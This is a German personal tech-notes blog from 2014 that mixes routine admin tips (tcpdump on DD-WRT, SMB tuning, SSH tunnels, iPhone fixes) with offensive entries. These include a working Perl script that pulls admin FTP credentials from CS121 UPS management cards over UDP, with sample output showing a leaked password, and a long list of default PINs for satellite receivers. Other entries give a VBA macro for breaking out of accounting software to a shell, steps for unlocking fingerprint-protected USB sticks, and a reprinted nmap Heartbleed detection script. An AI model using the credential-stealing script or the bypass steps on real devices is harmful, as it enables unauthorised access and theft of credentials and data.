Samstag, 27. Dezember 2014

Wireshark, DD-WRT, Linksys

Runterladen

http://downloads.openwrt.org/whiterussian/packages/libpcap_0.9.4-1_mipsel.ip
http://downloads.openwrt.org/whiterussian/packages/tcpdump_3.9.4-1_mipsel.ipk

mkdir /tmp/smbshare/tmp/ipkg
cd /tmp/smbshare/tmp/ipkg

ipkg -d smbfs install libpcap_0.9.4-1_mipsel.ipk

ipkg -d smbfs install tcpdump_3.9.4-1_mipsel.ipk

export LD_LIBRARY_PATH="$LD_LIBRARY_PATH:/tmp/smbshare/usr/lib"
PATH="$PATH:/tmp/smbshare/usr/sbin"



tcpdump host 10.20.30.40 -w /tmp/dump -s 65535

Dienstag, 9. Dezember 2014

SMB langsam unter OSX

Hat etwas geholfen:

user$ sudo -s
user$ vi /etc/smb.conf
[default]
streams=no
soft=yes
notify_off=yes
user$ vi /etc/nsmb.conf
[default]
streams=no
soft=yes
notify_off=yes
user$ vi /etc/sysctl.conf
net.inet.tcp.delayed_ack=0
net.inet.tcp.mssdflt=1460
net.inet.tcp.sendspace=65535
net.inet.tcp.recvspace=65535
net.inet.tcp.newreno=1
user$ reboot

Mittwoch, 1. Oktober 2014

Linux Versionen herausfinden

Linux-Kernel

uname -a

Distributionen


  • lsb_release -a
  • cat /etc/*release
  • cat /etc/*version
  • cat /etc/issue
  • cat /proc/version

Samstag, 20. September 2014

Kanaleditor

http://www.opena.tv/prismcube-ruby-xbmc/5439-channel-editor-fuer-prismcube.html

Montag, 15. September 2014

DM 800 Smooth Jazz von RadioTunes fka sky.fm

Smooth Jazz DM 800

Das Verzeichnis /etc/enigma2 ist dein Freund...

vi newnigma2-webradio.xml
<?xml version="1.0" encoding="UTF-8" ?>
<stationlist>
<station name="Doris Smooth Jazz" mt="audio/mpeg" id="http://pub9am.radiotunes.com:80/radiotunes_smoothjazz?e87ac3750ea604a35d4b75ba" br="128" genre="Smooth Jazz" ct="" lc=""> </station>
<station name="Doris Smooth Jazz 7/24" mt="audio/mpeg" id="http://pub10am.radiotunes.com:80/radiotunes_smoothjazz247?e87ac3750ea604a35d4b75ba" br="128" genre="Smooth Jazz" ct="" lc=""> </s
<station name="Doris Smooth Jazz Lounge" mt="audio/mpeg" id="http://pub10am.radiotunes.com:80/radiotunes_smoothlounge?e87ac3750ea604a35d4b75ba" br="128" genre="Smooth Jazz" ct="" lc=""> </
<station name="Rock Antenne" mt="audio/mpeg" id="http://mp3.webradio.rockantenne.de:80" br="128" genre="Classic Rock" ct="" lc="2531"> </station>
<station name="Antenne Bayern" mt="audio/mpeg" id="http://mp3.webradio.antenne.de:80" br="128" genre="Classic Rock" ct="" lc="2531"> </station>
</stationlist>

Dienstag, 3. Juni 2014

Prismcube

Das sollte man sich merken:

http://forum.abipbox.com/
http://www.myipbox.info


Default Passwörter bei SAT Receivern


Acc: 0786
Akai: 9009
Amstrad SilverLine: 3472
Amstrad CromLine: 0000
Ariza: 0786
Asterix/Digibox: 8175
Astra 3472: 6789, 9876
Astrovox: 1668, 1010
Aztech : 1004, 1111
Amstrad Silverline: 3472
Amstrad Cromline: 0000
Baff: 2142
Baftec 8008 Dragon: 1668
Benjamin: 1004, 1250
Besat: 8175
Bluejay: 3742
Botek: 5183
Botech 2000-2001 ci: 4200
Citizen: 7604
Coolsat: 0103
Daewoo: 8503
Digimaster 4100 FTA: 2606
Digimaster 4200 FTA: 2606
Digimaster 4300 CI: 2606
Digimaster 4400 CIP: 2606
Digital and QMax: 0325, 0867, 0876
Digital Telecom: 0851, 1004, 3472
Digitel: 0867, 0786
Dizipia: 2142
Druck: 1324, 1424, 1524, 1624
DV: 8503
DWay: 8503
Echostar: 7604, 2441, 3604
EchoStar: 3453
EchoStar 2200-1200: 7604
EchoStar 2110: 3453
Emtech/Jesspen: [Menü] installation, STB, OK, 9876
Euromax Em 5000/7000CI: 2142
Eurostar: 9999
Euro Star: 9949
EuroStar / UroBox: [Menü] und dann [9999] und [Ok], dann [0000] und [OK], Fortec Star 5100PLUS: 1010, 1668, 1002, 1111
Fortec Star LiFETIME: 1010, 1012, 9966, 6699, 0000
FOrtec Star: 1002, 2228, 2002, 2004
Fortec Star 6000: 1002
Fortecstar Oneworld: 0914
Galaxis: 9949
Galaxy: 9949
Golden Interstar: 2142
Goldmaster SAT-60100: 3453
Goldmaster SAT-60500: 3453
Goldmaster SAT-70500: 3453
Goldmaster SAT-70700: 3453
Goldmaster SAT-80100: 3453
Goldmaster SAT-80300: 3453
Goldmaster SAT-80500: 3453
Goldmaster SAT-80700: 3453
Goldmaster SAT-80900: 3453
Goldmaster SAT-90200: 3453
Goldmaster SAT-90400: 3453
Goldmaster SAT-7200 FTA: 2606
Goldmaster SAT-7300 CI: 2606
Goldmaster SAT-7400 CIM: 2606
Goldmaster SAT-7800 PVR: 2606
Goldmaster SAT-4150 FTA: 2606
Goldmaster SAT-4100 FTA: 2606
Goldmaster SAT-4800 PVR: 2606
Goldmaster SAT-9200: 2606
Goldmaster SAT-9400 CI: 2606
Goldmaster SAT-9500 CIM: 2606
Goldmaster SAT-9600 CIP: 2606
Goldmaster SAT-9800 PVR: 2606
Goldmaster SAT-9900 PVR: 2606
Goldmaster SAT-8150 FTA: 3141
Goldmaster SAT-8200 FTA: 3141
Goldmaster SAT-8210: 3141
Goldmaster SAT-8300 CI: 3141
Goldmaster SAT-8350 CI: 3141
Goldmaster SAT-8400 CIM: 3141
Goldmaster SAT-10200: 3141-9247
Goldmaster SAT-10210: 3141
Goldmaster SAT-11300 CI: 9247
Goldmaster SAT-11400 CIM: 9247
Goldmaster SAT-15400 CIM: 9247
Goldmaster SAT-16000 : 1600
Goldmaster SAT-16300: 1600
Goldmaster SAT-16500: 1600
Goldmaster SAT-17000: 1700
Humax 5400 Master Code: [Menü] Installation [rot] [grün] [gelb] [blau] [weis] dann [0] danach pin 0000
Hyundai: 0325, 6962
Hyundai 1100 MCOM: 1004
Kaon: von links nach rechts - [Rot] + [Grün] + [Blau] + [Gelb]
Kaon: [Gelb] [0000] 2x [Blau] 2x [Grün] 2x [Rot] [Menü]
Kaon: [gelb] [blau] [grün] [menü]
Kyoto: 3453
Lazer: 3141
Lorans: 1250
Maximum S 1000 FTA: 2580
Maximum S 1002 M CI: 2580
Mediacom MFT 930I: 5347
Mediacom MFT 910I: 1250
Mediacom EXEL: 1250
Mediacom MCI Elite: 7777
Metabox 1-2-3: 1004
Megastar 700 FTA: 2606, 3141
Megastar 800 CI: 2606
Megastar 800 CIM: 2606
Megastar 700 FTA: 3141
Natvision: 1668, 1010
Neosat: 1631, 6805
Neosat Old SX 9600: 3472, 3478
Neosat SX-9800CI: 2580, 3842
Neosat New 9600: 8510
Neosat 9800I: 2142
Neosat 9800CI (old): 8510
Neosat: 1631, 6805
Neotionbox 3000: 3141
Neotionbox 501: 3384
Neotionbox 1000/1000s/NB 601: 0367
Next Wawe: 8503
Next 8000xcam: 4132
Next gri seri: 0000
Next plus serisi: 8503
Next 5000 serisi: 1234, 1004
Next siyah seri: 0000
Next 3000A: 0000
Next 3000AP: 0000
Next 1000 (STAR1 ): 5183
Next 10001 PLUS:: 3453
New QMA X: 0325, 0867, 0876
Nokia 9800-9860: 1234
Nokia 9200: 147258
Nokia 9600: 1234
Oliverstar: [Menü]-Taste und [9999] dann [OK]
Onwa X2 FTA: 3141
Onwa X3 FTA: 2606
Onwa X4: 3141
Onwa X5 CI: 2606
Onwa X7 CIM: 2606
Onwa X9 PVR: 2606
Onwa X2 FTA: 3141
Onwa X6 CI: 3141
Onwa X13 CIM: 3141
Onwa X23 CIM: 3141
Opensky: 0786
Opentel: 0937, 3472
Pace: 9949
Pansat: 1668, 1010
Pengamin: 1250
Radix: 9815
Redliner 9500 CI: 1001
Roadmaster: 7787
Samsat: 0937
Samsung : 0235, 7777
Samsung 702: 9911
Samsung 202 SVACI: 1631
Samsung Model DSR 2000: [Menü]-taste, gehe zu system info und dann [0000] tippen
SanyoSat 5400-5700-7000: 3472, 2374, 3724, 1250, 6893
SanyoSat Viaccess: 7176, 2606, 1470, 2441
SanyoSat (Plus) 5000-9000: 2606
Satcruiser: 3742
Sky X: 0103, 1004
Smart: 3472, 6934
Spark 1100: 1004
Spark 3000 Magic: 2441
StarPro: 5889
Starsat: 1234, 1361, 1999, 9876
Startrack: 0786
Strong: 0235, 0325, 1361, 0735
Strong FreeCam: 0235, 0735
Sunny: 2580, 7777
Sunsui: 0937
Super Lazer 20000/1000: 2142
SuperMax: 8503
Superstar: 2142
Taplin: 3453
TechnoSat: 3724, 2374, 7176, 2606, 1470, 2441, 3724, 1250, 6893
Teleman: 7176, 1973
Tokyo: 3472
Topfield: 2999, 2606
Topfield 3100 FEI: 2606
Topfield 3000 CIPRO: 2606
Topfield 3000 CIPPRO: 2606
Topfield 3100 CIPPRO: 2606
Topfield 3100 FI: 2606
Topfield 3100 FE: 2606
Topfield 3300 F: 2606
Topfield 3030 F: 2606
Topfield 4000 PVR: 2606
Topfield 5000 PVR: 2606
Topfield 5300 CI: 2606
Toshiba: 1048
Urobox: 9999
Vestel: 8277, 929526
Viewsat: 0937, 3570
Viva: 0786
Vortec: 2002, 7777
Wisplus: 5030
YuMaTu x-200: 8888
YuMaTu 9500: 8503
YuMaTu 5500-8000: 2441
Zinwell: 8888


Quelle: http://www.sat-ulc.eu/showthread.php?t=9955

Sonntag, 18. Mai 2014

CS121 UPS / USV

thank's to JKMAC and the FD list:

CS121 is a widely used management card in ups systems from Legrand, Rittal, Eaton,  AEG, Masterguard.

/upssearch.pl   $IP

UPS: <VERSION> CS124-16M32M, ROM-Version: 2.3.4(pduc) - Aug 27, 2010 

Target system parameters (current):
Default Protocol : TCP/IP
Default Driver   : Ethernet
Mac address      : 00-03-05-00-00-00
IP address       : XX.XX.XX.XX
Net Mask         : 255.255.255.192
Default Gateway  : XX.XX.XX.XX
DHCP             : 0.0.0.0
DNS              : 0.0.0.0
Port for tools   : 4000


Searching login
USER: admin, PASS: hg478wegzsu, ACCOUNT: none 
 
and the code:
 
#!/usr/bin/perl -w
use IO::Socket;      
use constant MAXBYTES => scalar 1024;      

$socket = IO::Socket::INET->new( PeerPort  => 4000,
                                 PeerAddr  => $ARGV[0],
                                 Type      => SOCK_DGRAM,
                                 Proto     => 'udp');

$socket->send("<VERSION>");
$socket->recv($inline, MAXBYTES);
print "UPS: $inline \n"; 

$socket->send("show syspar");
$socket->recv($inline, MAXBYTES);
print "$inline\n";

print "Searching login\n" ; 
$socket->send("start");
$socket->recv($inline, MAXBYTES);
$socket->send("cd /flash");
$socket->send("type ftp_accounts.txt"); 

while($socket->recv($inline, MAXBYTES)) { 
  if($inline =~ /admin/ig) { print $inline; exit;  }
}

sleep(1);
 

Sonntag, 27. April 2014

Buchhaltung Addison 10it Ausbruch über Excel

Wer einen guten Steuerberater hat, braucht keine Angst vor diesem Makro haben:


Sub ausbruch()
Dim ausbruch
Shell ("cmd.exe")
End Sub

Heartbleed and NMAP

Thanks to nmap and the team...

nmap -sV --script=ssl-heartbleed <target>

ssl-heartbleed.nse
description = [[
Detects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160).
The code is based on the Python script ssltest.py authored by Jared Stafford (jspenguin@jspenguin.org)
]]

---
-- @usage
-- nmap -p 443 --script ssl-heartbleed <target>
--
-- @output
-- PORT    STATE SERVICE
-- 443/tcp open  https
-- | ssl-heartbleed:
-- |   VULNERABLE:
-- |   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
-- |     State: VULNERABLE
-- |     Risk factor: High
-- |     Description:
-- |       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
-- |
-- |     References:
-- |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
-- |       http://www.openssl.org/news/secadv_20140407.txt
-- |_      http://cvedetails.com/cve/2014-0160/
--
--
-- @args ssl-heartbleed.protocols (default tries all) TLS 1.0, TLS 1.1, or TLS 1.2
--

local bin = require('bin')
local match = require('match')
local nmap = require('nmap')
local shortport = require('shortport')
local sslcert = require('sslcert')
local stdnse = require('stdnse')
local string = require('string')
local table = require('table')
local vulns = require('vulns')

author = "Patrik Karlsson <patrik@cqure.net>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = { "vuln", "safe" }

local arg_protocols = stdnse.get_script_args(SCRIPT_NAME .. ".protocols") or {'TLS 1.0', 'TLS 1.1', 'TLS 1.2'}

portrule = function(host, port)
  return shortport.ssl(host, port) or sslcert.isPortSupported(port)
end

local function recvhdr(s)
  local status, hdr = s:receive_buf(match.numbytes(5), true)
  if not status then
    stdnse.print_debug(3, 'Unexpected EOF receiving record header - server closed connection')
    return
  end
  local pos, typ, ver, ln = bin.unpack('>CSS', hdr)
  return status, typ, ver, ln
end

local function recvmsg(s, len)
  local status, pay = s:receive_buf(match.numbytes(len), true)
  if not status then
    stdnse.print_debug(3, 'Unexpected EOF receiving record payload - server closed connection')
    return
  end
  return true, pay
end

local function testversion(host, port, version)

  local hello = bin.pack('HHH', "16", version, table.concat(
      {
        "00 dc", -- record length
        "01", -- handshake type ClientHello
        "00 00 d8", -- body length
        "03 02", -- TLSv1.1
        "53 43 5b 90", -- date/time (Tue Apr  8 02:14:40 2014)
        "9d9b720bbc0cbc2b92a84897cfbd3904cc160a8503909f770433d4de", -- random
        "00", -- session ID
        "00 66", -- cipher suites length (102 = 51 suites)
        "c0 14", -- TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
        "c0 0a", -- TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
        "c0 22", -- TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA
        "c0 21", -- TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA
        "00 39", -- TLS_DHE_RSA_WITH_AES_256_CBC_SHA
        "00 38", -- TLS_DHE_DSS_WITH_AES_256_CBC_SHA
        "00 88", -- TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
        "00 87", -- TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA
        "c0 0f", -- TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
        "c0 05", -- TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
        "00 35", -- TLS_RSA_WITH_AES_256_CBC_SHA
        "00 84", -- TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
        "c0 12", -- TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
        "c0 08", -- TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
        "c0 1c", -- TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA
        "c0 1b", -- TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA
        "00 16", -- TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
        "00 13", -- TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA
        "c0 0d", -- TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
        "c0 03", -- TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
        "00 0a", -- TLS_RSA_WITH_3DES_EDE_CBC_SHA
        "c0 13", -- TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
        "c0 09", -- TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
        "c0 1f", -- TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA
        "c0 1e", -- TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA
        "00 33", -- TLS_DHE_RSA_WITH_AES_128_CBC_SHA
        "00 32", -- TLS_DHE_DSS_WITH_AES_128_CBC_SHA
        "00 9a", -- TLS_DHE_RSA_WITH_SEED_CBC_SHA
        "00 99", -- TLS_DHE_DSS_WITH_SEED_CBC_SHA
        "00 45", -- TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
        "00 44", -- TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA
        "c0 0e", -- TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
        "c0 04", -- TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
        "00 2f", -- TLS_RSA_WITH_AES_128_CBC_SHA
        "00 96", -- TLS_RSA_WITH_SEED_CBC_SHA
        "00 41", -- TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
        "c0 11", -- TLS_ECDHE_RSA_WITH_RC4_128_SHA
        "c0 07", -- TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
        "c0 0c", -- TLS_ECDH_RSA_WITH_RC4_128_SHA
        "c0 02", -- TLS_ECDH_ECDSA_WITH_RC4_128_SHA
        "00 05", -- TLS_RSA_WITH_RC4_128_SHA
        "00 04", -- TLS_RSA_WITH_RC4_128_MD5
        "00 15", -- TLS_DHE_RSA_WITH_DES_CBC_SHA
        "00 12", -- TLS_DHE_DSS_WITH_DES_CBC_SHA
        "00 09", -- TLS_RSA_WITH_DES_CBC_SHA
        "00 14", -- TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
        "00 11", -- TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA
        "00 08", -- TLS_RSA_EXPORT_WITH_DES40_CBC_SHA
        "00 06", -- TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5
        "00 03", -- TLS_RSA_EXPORT_WITH_RC4_40_MD5
        "00 ff", -- TLS_EMPTY_RENEGOTIATION_INFO_SCSV (RFC 5746)
        "01", -- compressors length
        "00", -- NULL compressor
        "00 49", -- extensions length
        "00 0b", -- ec_point_formats
        "00 04", -- ec_point_formats length
        "03", -- point formats length
        "00", -- ec_point_formats uncompressed
        "01", -- ec_point_formats ansiX962_compressed_prime
        "02", -- ec_point_formats ansiX962_compressed_char2
        "00 0a", -- elliptic_curves
        "00 34", -- elliptic_curves length
        "00 32", -- elliptic curves length
        "00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11", -- elliptic_curves data (all curves)
        "00 23", -- SessionTicket TLS
        "00 00", -- SessionTicket length
        "00 0f", -- heartbeat
        "00 01", -- heartbeat length
        "01", -- heartbeat data: peer_allowed_to_send
      })
    )

  local hb = bin.pack('HHH', '18', version, table.concat({
        "00 03", -- record length
        "01", -- HeartbeatType HeartbeatRequest
        "0f e9", -- payload length (falsified)
        -- payload length is based on 4096 - 16 bytes padding - 8 bytes packet header + 1 to overflow
      })
    )

  local s
  local specialized = sslcert.getPrepareTLSWithoutReconnect(port)
  if specialized then
    local status
    status, s = specialized(host, port)
    if not status then
      stdnse.print_debug(3, "Connection to server failed")
      return
    end
  else
    s = nmap.new_socket()
    local status = s:connect(host, port)
    if not status then
      stdnse.print_debug(3, "Connection to server failed")
      return
    end
  end

  s:set_timeout(5000)

  if not s:send(hello) then
    stdnse.print_debug(3, "Failed to send packet to server")
    return
  end

  while(true) do
    local status, typ, ver, pay, len
    status, typ, ver, len = recvhdr(s)
    if not status then
      return
    end
    status, pay = recvmsg(s, len)
    if ( typ == 22 and string.byte(pay,1) == 14 ) then break end
  end

  s:send(hb)
  while(true) do
    local status, typ, ver, len = recvhdr(s)
    if not status then
      stdnse.print_debug(3, 'No heartbeat response received, server likely not vulnerable')
      break
    end
    if typ == 24 then
      local pay
      status, pay = recvmsg(s, len)
      s:close()
      if #pay > 3 then
        return true
      else
        stdnse.print_debug(3, 'Server processed malformed heartbeat, but did not return any extra data.')
        break
      end
    elseif typ == 21 then
      stdnse.print_debug(3, 'Server returned error, likely not vulnerable')
      break
    end
  end

end

action = function(host, port)
  local vuln_table = {
    title = "The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.",
    state = vulns.STATE.NOT_VULN,
    risk_factor = "High",
    description = [[
OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
    ]],

    references = {
      'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160',
      'http://www.openssl.org/news/secadv_20140407.txt ',
      'http://cvedetails.com/cve/2014-0160/'
    }
  }

  local versions = {
    -- ['SSL 3.0'] = '03 00',
    ['TLS 1.0'] = '03 01',
    ['TLS 1.1'] = '03 02',
    ['TLS 1.2'] = '03 03'
  }

  local report = vulns.Report:new(SCRIPT_NAME, host, port)
  local test_vers = arg_protocols

  if type(test_vers) == 'string' then
    test_vers = { test_vers }
  end

  for _, ver in ipairs(test_vers) do
    if nil == versions[ver] then
      return "\n  Unsupported protocol version: " .. ver
    end
    local status = testversion(host, port, versions[ver])
    if ( status ) then
      vuln_table.state = vulns.STATE.VULN
      break
    end
  end

  return report:make_output(vuln_table)
end

Donnerstag, 13. März 2014

Drohne und Telnet

Das habe ich mal gefunden..

http://drones.johnback.us/blog/2013/02/03/programming-multiple-parrot-a-dot-r-drones-on-one-network-with-node-dot-js/

http://nodecopter.com/hack

and thanks to

Diego Araos aka daraosn for:


#!/usr/bin/env bash
usage() {
cat << EOF
__ __ __ __ __
/\ |__) | \|__)/ \|\ ||_
/--\| \ . |__/| \ \__/| \||__

WPA/WPA2 support

This script connects the AR Drone to a WPA/WPA2 secured network.

Usage: script/connect "<essid>" -p "<password>" [-a <address>] [-d <droneip>]
<essid> Name of the WPA2 network to connect the drone to.
<password> Password of the network.
<address> (optional) Address to be set on the drone when connected to the network.
Use a different address than the router's default.
Set to "auto" or "dhcp" to let the router DHCP server auto-assign an IP.
Default is "auto".
<droneip> (optional) Current drone's ip address.
Default is 192.168.1.1
EOF
}

ESSID=$1
PASSWORD=$3
ADDRESS=$5
DRONEIP=${7:-"192.168.1.1"}
DHCPC=""

if [[ -z $ADDRESS ]] || [[ $ADDRESS = "auto" ]] || [[ $ADDRESS = "dhcp" ]]; then
DHCPC="; wait 5; /sbin/udhcpc -i ath0"
  ADDRESS="0.0.0.0"
fi

IFCONFIG="ifconfig ath0 $ADDRESS;"

if [[ -z $ESSID ]] || [[ -z $PASSWORD ]]; then
usage; exit 1
fi

set -ue

echo "ESSID: $ESSID"
echo "PASSWORD: $PASSWORD"
echo "ADDRESS: $ADDRESS"
echo "DRONE_IP: $DRONEIP"

{( echo "\
wpa_passphrase '$ESSID' '$PASSWORD' > /etc/wpa_supplicant.conf
{ $IFCONFIG iwconfig ath0 essid '$ESSID' && wpa_supplicant -B -Dwext -iath0 -c/etc/wpa_supplicant.conf $DHCPC; } &
"; sleep 1; ) | telnet $DRONEIP > /dev/null; }

Donnerstag, 27. Februar 2014

Calender zwischen Outlook und Mac abgleichen: iCal4OL

NAS als TimeMachine

MAC OS X 10.6
defaults write com.apple.systempreferences TMShowUnsupportedNetworkVolumes 1
Image vom type "sparesbundle" anlegen und auf das NAS verschieben
hdiutil create -size 100g -fs HFS+J -volname "Backup" "Name_des_MAC_MAC-Adresse.sparsebundle"
"Name_des_MAC" ist der Rechnername aus "Sharing" in den Systemeinstellungen "MAC-Adresse" ist die MAC des Interfaces en0, aber ohne Doppelpunkte. z.B. 0016cbac4356

Und wieder ändern:
hdiutil resize -size 50g /Pfad/zum/Bundle/Image.sparsebundle

MAC Adresse unter XP onder W2K ändern



[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet?\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318
Unter DriverDesc Name der Netzwerkkarte suchen u.B. 0010
Neue "Zeichenfolge" mit "NetworkAddress" hinzufügen und als Wert die MAC Adresse (ohne Bindestriche) eingeben
LAN Verbindung deaktivieren und wieder starten

USB Stick mit Fingerprintreader knacken

USB-Sticks mit Fingerprintreader habe eine bekannte Schwachstelle.
In einer DOS-Box "tool.exe" ausführen, nachdem der Stick angeschlossen wurde.
1.) tool.exe -w
gibt die Liste der Laufwerke.
2.) Verschlüsselte Partition aussuchen: hier "I:"
3.) set tool=\\.\I:
4.) tool.exe -p -v -x "FC 00 00 00 00 00 00 00 01 00"
5.) have fun: b.t.w tool.exe gibts bei mir auf Anfrage!

SIP mit NOKIA

Wir definieren: $ ist eine Variable!
1) Nokia Menü
menue/system/einstellungen/verbindungen/sip-einstellungen
2) Settings
profilname: $PROFILNAME
dienstprofil: IETF
stand. zug. punkt : $WLANPROFIL
oef. Benutzername : sip:$USERNAME@$ASTERISK-IP
komprimierung verw : nein
anmeldung : bei bedarf #Kommentar: immer avitv kostet viel Akku
sicherheits mech verw : nein
proxyserver/proxyserver-adresse : sip:$ASTERISK-IP
proxyserver/gebiet : asterisk
proxyserver/benutzername : $USERNAME
proxyserver/passwort : $PASSWORT
proxyserver/loose routing erlauben : ja
proxyserver/transporttyp: udp
proxyserver/port : 5060
anmeldeserver/anmeldeserver-adresse : sip:$ASTERISK-IP
anmeldeserver/gebiet : asterisk
anmeldeserver/benutzername : $USERNAME
anmeldeserver/passwort : $PASSWORT
anmeldeserver/transporttyp : udp
anmeldeserver/port : 5060
3 ) Neues sip-profil anlegen
/menue/system/einstellungen/verbindungen/int(web)-telefonie:
optionen -> neues profil -> sip-uri auswaehlen

Windows 7 Lizenzmanagment

So man denn gezwungener massen sich mit Windows Server 2008 befassen muss, jedoch mehr als 180 Tage Testzeit benötigt, gibt es Kollegen, die als

Administrator

sich auf die Kommandozeile schwingen und kryptische Befehle ausführen....

slmgr.vbs

Die Parameter sind:

-itk = für einen neuen Key (löscht den alten Key)
-upk = löscht einen Key
-ato = versucht zum Aktivieren
-dlv = gibt ausführliche Infos
-xpr = erweiterte Infos
-rearm = 30 Tage neu setzen
-dli = Status der Aktivierung

Thunderbird Plugin Extension "blafasel” wird nicht installiert, da es keine sicheren Updates anbietet

In Thunderbird das Add-On "ViewAbout" installieren

Nach Neustart: Ansicht:ViewAbout
about:config
Rechte Maustaste -> Neu -> Boolean
extensions.checkUpdateSecurity
Wert: false

NT Passwörter mit Linux setzen...

apt-get install chntpw

Vodafone ZTE Modem

Download the connection manager (from internal SVN or MF626_MAC_UI_M02.zip. It is for some device called MF626, which seems to be the same.

Do not install this package!
Instead ./Contents/Packages/drv.pkg (can be reached by e.g. right-click - show package contents).
Now plug in the UMTS-stick and wait for the ZeroCD-crap to be mounted.
Eject the device in the Finder.
Ignore any "found new devices"-messages for now.
Open Terminal.app and run sudo screen /dev/tty.ZTEUSBATPort.
Type: at+zcdrun=8, press enter. You should receive "Close autorun state result(0:FAIL 1:SUCCESS):1". The annoying flash-drive is now disabled.
Now open System Preferences and choose "ZTEUSBModem". Go through Advanced - Modem and choose "Generic" as vendor and "GPRS (GSM/3G)" as device. Don't forget to enter the APN if your provider requires you to do so.
Use *99# as phone number.

Datenleck in Microsofts Cloud

Quelle insite-it.ch

Donnerstag, 23.12.2010
Peinliches Datenleck bei Microsofts Online-Service

BPOS-User hatten Zugriff auf Adressbücher anderer Kunden.

In Microsofts "Business Productivity Online Suite" (BPOS), der gehosteten Version von Exchange, SharePoint, Office Communications und Office Live Meeting ist es weltweit zu einem Datenleck gekommen, wie die holländische 'Webwereld' gestern berichtete. User der Standard-Version hatten eine kurze Zeit lang Zugriff auf die Firmen-Adressbücher anderer Kunden, die für den Offline-Gebrauch heruntergeladen werden können. Diese Adressbücher sind Teil von Exchange und enthalten beispielsweise die Adressen von Business-Kontakten eines Unternehmens.

Microsoft bestätigte gegenüber 'Webwereld' das Leck, über das alle BPOS-Kunden und Partner durch ein E-Mail informiert worden waren. Es sei durch einen "Konfigurationsfehler" entstanden und innert zwei Stunden entdeckt und behoben worden. Eine kleine Zahl von Kunden habe aber unberechtigterweise Adressbüchern von anderen heruntergeladen.

Man arbeite nun mit dieses Usern daran, um Daten wieder zu löschen.

Im erwähnten Mail an alle Kunden heisst es, dass kein Handlungsbedarf ihrerseits bestehe. Man habe sie aber alle informieren wollen, weil man die Verantwortung für die Daten der Kunden ernst nehme.

Dass dies eine ernste Sache ist, sieht Microsoft wohl richtig. Die Sorge darum, dass Businessdaten in falsche Hände geraten könnten, ist eines der grössten Hindernisse für die breitere Adoption von Cloud-Services durch Unternehmen. Da kommt ein Faux-Pas wie dieser, auch wenn das Leck schnell wieder behoben wurde, äusserst ungelegen, sowohl für Microsoft selbst als auch für andere Cloud-Anbieter.

iPhone out of Boot Loop

First of all: you need third party software: download the cross-platform iRecovery utility from ihackintosh.com.

./irecovery -s

After the info screen enter:

setenv auto-boot true
saveenv
/exit

Reboot your device and be happy :-)

Brother MFC Scanner Fehler TW006

Sollte mal wieder der Fehler TW006 auftreten:

Folgende Datei editieren und die Namensauflösung lokal eingeben. Vermutung: der Fehler tritt auf, wenn der Knotennahmen mehr als 16 Zeichen hat!
Datei
C:\Windows\System32\drivers\etc\hosts

iPhone Error 1013

Beim Update auf IOS 4.3 sagte mein iTunes immer: Unbekannter Fehler 1013

Die Lösung:
Man nehme sich ein Terminal

und editier als root die /etc/hosts

Die Einträge "gs.apple.com" kommentiert man mit einem "#" aus.

Danach: viel Spass mit dem neuen IOS!

SCP Plugin Error

In case of "Server certificate verification failed"
just do:
/Library/Contextual\ Menu\ Items/SCFinderPlugin.plugin/Contents/Resources/SCPluginUIDaemon.app/Contents/bin/svn ls https://yourserver...

ssh Tunnel(n)

ssh -L 127.0.0.1:AAAA:SERVER:BBBB GATEWAY

oder


ssh -L AAAA:SERVER:BBBB GATEWAY

AAAA=Lokaler Port
SERVER=IP Remote Server
BBBB=Remote Port
